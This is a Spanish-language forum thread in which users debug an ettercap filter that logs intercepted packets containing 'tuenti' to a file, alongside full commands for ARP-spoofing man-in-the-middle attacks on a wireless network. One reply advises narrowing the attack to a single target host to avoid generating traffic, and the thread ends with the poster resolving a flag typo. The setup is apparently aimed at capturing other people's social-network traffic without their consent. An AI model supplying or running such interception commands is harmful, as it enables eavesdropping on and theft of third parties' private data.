Problema con filtro en ettercap

Iniciado por Fastolfe, 25 Diciembre 2011, 19:04 PM

0 Miembros y 1 Visitante están viendo este tema.

Fastolfe

Buenas, el filtro es el siguiente:

if (search(DATA.data,"tuenti")){
log(DATA.data, "/tmp/log.log");
}

Lo compilo con "etterfilter f2 -o filtro", se compila correctamente:

12 protocol tables loaded:
   DECODED DATA udp tcp gre icmp ip arp wifi fddi tr eth

11 constants loaded:
   VRRP OSPF GRE UDP TCP ICMP6 ICMP PPTP PPPoE IP ARP

Parsing source file 'f2'  done.

Unfolding the meta-tree  done.

Converting labels to real offsets  done.

Writing output to 'filtro'  done.

-> Script encoded into 4 instructions.

Pero al poner el ettercap (ettercap -t -f filtro -M arp:remote // -i wlan0) me sale:
TARGET (filtro) contains invalid chars !

Alguien sabe que falla?

Gracias de antemano!! =)

vlaxys

Hola espero esto te sirva, yo de esta manera compilo los filtros, en tu caso seria asi:
etterfilter f2 -o filtro.ef

y lo ejecuto de la siguiente manera

ettercap -Tq -f filtro.ef -M -iwlan0 arp:remote //  //

tambie te recomiendo que para no generar mucho trafico solo apliques el ataque para un solos equipo ejemplo:

ettercap -Tq -f filtro.ef -M -iwlan0 arp:remote /192.168.1.8/ //
__________________________________________________________________________________


Fastolfe

Gracias por la ayuda vlaxys =) Pero ahora el fallo es:

Listening on wlan0...
ERROR : 16, Device or resource busy
[ec_capture.c:capture_init:171]

La cuestión es que cuando quito la opcion -f funciona, no lo entiendo...

alpha015


Fastolfe

Gracias por la recomendación alpha015, le echo un vistazo y te comento! =)

Fastolfe

Las 18 páginas que llevo están bien. nunca está de más "repasar", asi que gracias de nuevo alpha015!!

He descubierto el error... y no podría ser más ridículo... 'F' en lugar de 'f'...